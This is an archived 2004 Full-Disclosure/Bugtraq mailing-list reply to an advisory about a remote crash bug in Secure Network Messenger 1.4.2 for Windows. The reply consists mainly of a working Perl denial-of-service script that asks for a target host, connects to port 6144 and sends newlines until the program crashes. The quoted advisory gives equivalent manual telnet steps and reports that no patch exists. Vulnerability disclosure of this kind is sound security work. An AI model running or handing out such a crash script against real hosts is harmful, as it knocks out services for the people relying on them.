lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <001101c4c9d3$d08276f0$647ba8c0@rbcutl65tbc0s8>
Date: Sat, 13 Nov 2004 23:54:54 +0100
From: "r`Futile" <clearscreen@...antrope.com>
To: <bugtraq@...urityfocus.com>, <bugs@...uritytracker.com>,
   <news@...uriteam.com>, <full-disclosure@...ts.netsys.com>,
   <vuln@...unia.com>
Subject: Re: Crash in Secure Network Messenger 1.4.2


And here is my proof of concept:

#!/usr/bin/perl

use IO::Socket;
print ("\nSecure Network Messenger Crasher by ClearScreen\n");
print ("\nEnter host to crash: ");
$h = <STDIN>;
chomp $h;
$socks = IO::Socket::INET->new(
        Proto => "tcp",
        PeerPort => "6144",
        PeerAddr => "$h"
) or die "\nNo response from host.";

sleep 1;
print "\nSuccesfully connected to $h!\n";
for ($count=1; $count<15; $count++)
{
 print $socks "\n";
 select(undef, undef, undef, 0.1);
}
print "\nMessenger crashed.";
close $socks;

Greetz, clearscreen :)


----- Original Message ----- 
From: "Luigi Auriemma" <aluigi@...istici.org>
To: <bugtraq@...urityfocus.com>; <bugs@...uritytracker.com>; 
<news@...uriteam.com>; <full-disclosure@...ts.netsys.com>; 
<vuln@...unia.com>
Sent: Friday, November 12, 2004 9:52 PM
Subject: Crash in Secure Network Messenger 1.4.2


>
> #######################################################################
>
>                             Luigi Auriemma
>
> Application:  Secure Network Messenger
>              http://www.networkmessengers.com/msg/
> Versions:     <= 1.4.2
> Platforms:    Windows
> Bug:          crash
> Exploitation: remote
> Date:         12 November 2004
> Author:       Luigi Auriemma
>              e-mail: aluigi@...ervista.org
>              web:    http://aluigi.altervista.org
>
>
> #######################################################################
>
>
> 1) Introduction
> 2) Bug
> 3) The Code
> 4) Fix
>
>
> #######################################################################
>
> ===============
> 1) Introduction
> ===============
>
>
> Secure Network Messenger is a LAN messenger for Windows for exchanging
> encrypted messages and files.
>
>
> #######################################################################
>
> ======
> 2) Bug
> ======
>
>
> Is possible to crash the program sending malformed data.
>
>
> #######################################################################
>
> ===========
> 3) The Code
> ===========
>
>
> Launch a telnet client and connect to the victim host on port 6144.
> Now press RETURN about 10 times or more.
> Disconnect, reconnect again and press RETURN.
> The remote host should be crashed.
>
>
> #######################################################################
>
> ======
> 4) Fix
> ======
>
>
> No fix.
> Over one month ago the developers said that they had to fix this bug
> soon... no patch has been released yet.
>
>
> #######################################################################
>
>
> --- 
> Luigi Auriemma
> http://aluigi.altervista.org
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ